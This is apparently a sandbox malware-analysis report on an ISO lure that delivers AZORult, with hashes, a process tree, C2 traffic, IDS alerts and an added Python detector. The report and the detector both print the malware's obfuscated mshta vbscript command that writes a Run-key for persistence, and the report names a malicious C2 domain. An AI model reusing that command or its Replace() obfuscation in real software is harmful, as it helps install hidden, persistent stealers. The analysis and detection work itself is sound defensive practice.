File name: | 6d1c1c922da4c1c7dd78bfad3930c257.iso |
Full analysis: | https://app.any.run/tasks/5d50876d-a7a0-4ac8-ba9d-db83a6c40fba |
Verdict: | Malicious activity |
Threats: | AZORult can steal banking information, including passwords and credit card details, as well as cryptocurrency. This constantly updated information stealer malware should not be taken lightly, as it continues to be an active threat. |
Analysis date: | December 06, 2018, 07:59:50 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/x-iso9660-image |
File info: | ISO 9660 CD-ROM filesystem data '2018-0612_ScannedCopy_0746326589' |
MD5: | 6D1C1C922DA4C1C7DD78BFAD3930C257 |
SHA1: | 3DC542527B4CEA7F4939C815C2D1C5BF2EC66DF4 |
SHA256: | 2358572417EB814C39EDFF9D63C910525756AE82D47438463737937B939DE48E |
SSDEEP: | 6144:cBO7Ef/7Q/11ppBseSxPbqimLKVSQtWkXxQv6tYfoCRjVbd614f0Us+1MsN:cBrg11pjsHdOGWKI6tn |
Extension | Type (score)
---|---
.iso | ISO 9660 CD image (27.6)
.atn | Photoshop Action (27.1)
.gmc | Game Music Creator Music (6.1)
VolumeSize: | 540 kB |
VolumeModifyDate: | 2018:12:06 07:47:06.00+01:00 |
VolumeCreateDate: | 2018:12:06 07:47:06.00+01:00 |
Software: | PowerISO |
RootDirectoryCreateDate: | 2018:12:06 07:47:06+01:00 |
VolumeBlockSize: | 2048 |
VolumeBlockCount: | 270 |
VolumeName: | 2018-0612_ScannedCopy_0746326589 |
System: | Win32 |
PID | CMD | Path | Indicators | Parent process | Process details
---|---|---|---|---|---
2928 | "C:\Windows\system32\rundll32.exe" C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Users\admin\AppData\Local\Temp\6d1c1c922da4c1c7dd78bfad3930c257.iso | C:\Windows\system32\rundll32.exe | — | explorer.exe | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Windows host process (Rundll32); Exit code: 0; Version: 6.1.7600.16385 (win7_rtm.090713-1255)
2820 | "C:\Program Files\WinRAR\WinRAR.exe" "C:\Users\admin\AppData\Local\Temp\6d1c1c922da4c1c7dd78bfad3930c257.iso" | C:\Program Files\WinRAR\WinRAR.exe | — | rundll32.exe | User: admin; Company: Alexander Roshal; Integrity Level: MEDIUM; Description: WinRAR archiver; Version: 5.60.0
912 | "C:\Users\admin\Desktop\2018-0612_ScannedCopy_0746326589_pdf.exe" | C:\Users\admin\Desktop\2018-0612_ScannedCopy_0746326589_pdf.exe | — | explorer.exe | User: admin; Company: SLUBBY; Integrity Level: MEDIUM; Description: VuRoFenceen; Exit code: 0; Version: 5.07.0009
3352 | "C:\Windows\System32\mshta.exe" vbscript:Execute(" str1 = ""WScript.Shell"" : str2 = ""Set WshShell = CrXXteObject(str1)"" : str2 = Replace(str2,""XX"",""ea"") : execute str2 : myKey = ""HKCU\Software\Microsoft\Windows\CurrentVersion\Run\SMKLAAS"" : WshShell.RegWrite myKey,""C:\Users\admin\AppData\Local\Temp\Konsumerede.exe"",""REG_SZ"" : window.close") | C:\Windows\System32\mshta.exe | — | 2018-0612_ScannedCopy_0746326589_pdf.exe | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Microsoft (R) HTML Application host; Exit code: 0; Version: 8.00.7600.16385 (win7_rtm.090713-1255)
2372 | "C:\Users\admin\AppData\Local\Temp\Konsumerede.exe" | C:\Users\admin\AppData\Local\Temp\Konsumerede.exe | — | 2018-0612_ScannedCopy_0746326589_pdf.exe | User: admin; Company: SLUBBY; Integrity Level: MEDIUM; Description: VuRoFenceen; Version: 5.07.0009
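The process tree above records the whole lure chain: the Windows 7 sandbox has no native ISO mounting, so the attachment is opened through the OpenAs_RunDLL "Open with" dialog, WinRAR unpacks `2018-0612_ScannedCopy_0746326589_pdf.exe` to the Desktop, and that binary drops and runs `Konsumerede.exe` and launches mshta.exe with an inline `vbscript:` handler that writes an HKCU Run key for it. The script builds `CreateObject` at runtime with `Replace()` so the token never appears in the command line. What follows is an added example and not part of the ANY.RUN report: a Python detector for that command-line pattern. It runs over constructed process-creation events modelled on the table (plus one constructed, benign-looking mshta launch as a control), statically applies the `Replace()` call to recover the hidden token, and extracts the RegWrite target. The event fields, regexes and function names are my own, and the document-lookalike filename pattern is an assumption.

```python
import re

# Constructed process-creation events modelled on the process tree in the
# report above (PIDs 912 and 3352) plus one constructed, benign-looking mshta
# launch as a control case. They are not exported sandbox data.
EVENTS = [
    {"pid": 912,
     "image": r"C:\Users\admin\Desktop\2018-0612_ScannedCopy_0746326589_pdf.exe",
     "cmdline": r'"C:\Users\admin\Desktop\2018-0612_ScannedCopy_0746326589_pdf.exe"',
     "parent": "explorer.exe"},
    {"pid": 3352,
     "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": r'"C:\Windows\System32\mshta.exe" vbscript:Execute(" str1 = ""WScript.Shell"" : str2 = ""Set WshShell = CrXXteObject(str1)"" : str2 = Replace(str2,""XX"",""ea"") : execute str2 : myKey = ""HKCU\Software\Microsoft\Windows\CurrentVersion\Run\SMKLAAS"" : WshShell.RegWrite myKey,""C:\Users\admin\AppData\Local\Temp\Konsumerede.exe"",""REG_SZ"" : window.close")',
     "parent": "2018-0612_ScannedCopy_0746326589_pdf.exe"},
    {"pid": 4100,
     "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": r'"C:\Windows\System32\mshta.exe" C:\Program Files\Vendor\setup.hta',
     "parent": "setup.exe"},
]

# Document-lookalike executable names such as "..._pdf.exe" (pattern is an assumption).
LOOKALIKE = re.compile(r'(?i)[._-](pdf|docx?|xlsx?|jpe?g|png)\.(exe|scr)$')
# x = Replace(x, "old", "new"): the runtime string rewrite used above to hide CreateObject.
REPLACE_CALL = re.compile(r'(\w+)\s*=\s*Replace\(\s*\1\s*,\s*"([^"]*)"\s*,\s*"([^"]*)"\s*\)',
                          re.IGNORECASE)
AUTOSTART = re.compile(r'(?i)\\CurrentVersion\\Run(Once)?\\')


def inline_script(cmdline):
    """Return (language, payload) when mshta is given an inline vbscript:/javascript:
    protocol handler instead of an .hta file on disk, else None."""
    m = re.search(r'(?i)mshta\.exe"?\s+(vbscript|javascript):(.*)$', cmdline, re.DOTALL)
    return (m.group(1).lower(), m.group(2)) if m else None


def execute_argument(payload):
    """Pull the string literal out of Execute("...") and undo VBScript's
    doubled-quote escaping so the inner script can be parsed."""
    m = re.search(r'(?i)Execute\(\s*"(.*)"\s*\)\s*$', payload, re.DOTALL)
    return m.group(1).replace('""', '"') if m else None


def resolve_replace(script):
    """Statically apply each x = Replace(x, "old", "new") to the string literal
    previously assigned to x, then drop the call. Only literal arguments are handled."""
    while True:
        m = REPLACE_CALL.search(script)
        if not m:
            return script
        var, old, new = m.groups()
        assign = re.compile(r'(\b%s\s*=\s*")([^"]*)(")' % re.escape(var), re.IGNORECASE)
        head = assign.sub(lambda a: a.group(1) + a.group(2).replace(old, new) + a.group(3),
                          script[:m.start()])
        script = re.sub(r':\s*:', ':', head + script[m.end():])


def string_literals(script):
    """Map each variable to the last string literal assigned to it."""
    return {m.group(1): m.group(2)
            for m in re.finditer(r'\b(\w+)\s*=\s*"([^"]*)"', script)}


def registry_writes(script):
    """Return (key, value) pairs passed to WshShell.RegWrite, resolving
    variables that hold string literals."""
    names = string_literals(script)
    pairs = []
    for m in re.finditer(r'(?i)\.RegWrite\s+(\w+|"[^"]*")\s*,\s*(\w+|"[^"]*")', script):
        key, value = (names.get(a, a.strip('"')) for a in m.groups())
        pairs.append((key, value))
    return pairs


def analyze(event):
    """Return the findings for one process-creation event (empty list = nothing notable)."""
    findings = []
    for field in ("image", "parent"):
        if LOOKALIKE.search(event[field]):
            findings.append(f"document-lookalike executable name in {field}: {event[field]}")
    hit = inline_script(event["cmdline"])
    if not hit:
        return findings
    lang, payload = hit
    findings.append(f"mshta launched with inline {lang}: payload, no .hta file on disk")
    script = execute_argument(payload) or payload
    resolved = resolve_replace(script)
    if not re.search(r'(?i)createobject', script) and re.search(r'(?i)createobject', resolved):
        findings.append("CreateObject assembled at runtime through Replace()")
    for key, value in registry_writes(resolved):
        if AUTOSTART.search(key):
            findings.append(f"Run-key persistence: {key} -> {value}")
    return findings


if __name__ == "__main__":
    for ev in EVENTS:
        for finding in analyze(ev) or ["no findings"]:
            print(ev["pid"], finding)
```

The control event shows why the first check keys on the `vbscript:`/`javascript:` protocol handler rather than on mshta.exe itself: mshta running a `.hta` from disk is common enough in enterprise software that alerting on the image alone is noise, while an inline script with no file on disk is rarely legitimate. The `Replace()` resolver only handles the literal-argument idiom seen in this sample; chained `Chr()` or `StrReverse()` obfuscation would need its own emulation.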
PID | Process | Filename | Type | MD5 | SHA256
---|---|---|---|---|---
912 | 2018-0612_ScannedCopy_0746326589_pdf.exe | C:\Users\admin\AppData\Local\VirtualStore\Windows\Borins | text | 4206DABEC60D7C778E87FF1744B6D2AC | 3EB22AA9E19B80AE0902E70D7706EA7667E8BEDBCC6AFF60E1CD657A2C4B41F1
2820 | WinRAR.exe | C:\Users\admin\Desktop\2018-0612_ScannedCopy_0746326589_pdf.exe | executable | A652EA077490B046CA275037F7D8B7A6 | B03F42FB9AEB5BE5221B7123E0E573D74508111A083BF9046ED7219B6CE009E9
912 | 2018-0612_ScannedCopy_0746326589_pdf.exe | C:\Users\admin\AppData\Local\Temp\~DF102DC8A321753A4C.TMP | binary | 778BAE7042E29EC6C44E41F6ED45215A | E1F2F139F1F5E02C68E5BACC62EE31BA5FEA196FB4FCB32711DEEA75D1A49E83
2372 | Konsumerede.exe | C:\Users\admin\AppData\Local\VirtualStore\Windows\Borins | text | 1B1E30768CEE423F368AD80A644686A8 | E2A414D21824CCB818C059F5EFF83F4AACB4907A1B6F901DA2AC498A77E6E2DF
912 | 2018-0612_ScannedCopy_0746326589_pdf.exe | C:\Users\admin\AppData\Local\Temp\Konsumerede.exe | executable | FF2B4B8DDDA05B06E35CCCDDD1A58FD8 | 58ADDCDC5B5A228A6ABE89F1B82E562F0CC548A93176CD151C833BF6810F6122
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
2372 | Konsumerede.exe | POST | — | 23.229.191.64:80 | http://cpinfo.partnership-international.com/index.php | US | — | — | malicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
2372 | Konsumerede.exe | 23.229.191.64:80 | cpinfo.partnership-international.com | GoDaddy.com, LLC | US | malicious |
Domain | IP | Reputation
---|---|---
cpinfo.partnership-international.com | 23.229.191.64 | malicious
PID | Process | Class | Message |
---|---|---|---|
2372 | Konsumerede.exe | A Network Trojan was detected | ET TROJAN AZORult Variant.4 Checkin M2 |
2372 | Konsumerede.exe | A Network Trojan was detected | MALWARE [PTsecurity] AZORult client request |
2372 | Konsumerede.exe | A Network Trojan was detected | MALWARE [PTsecurity] AZORult HTTP Header |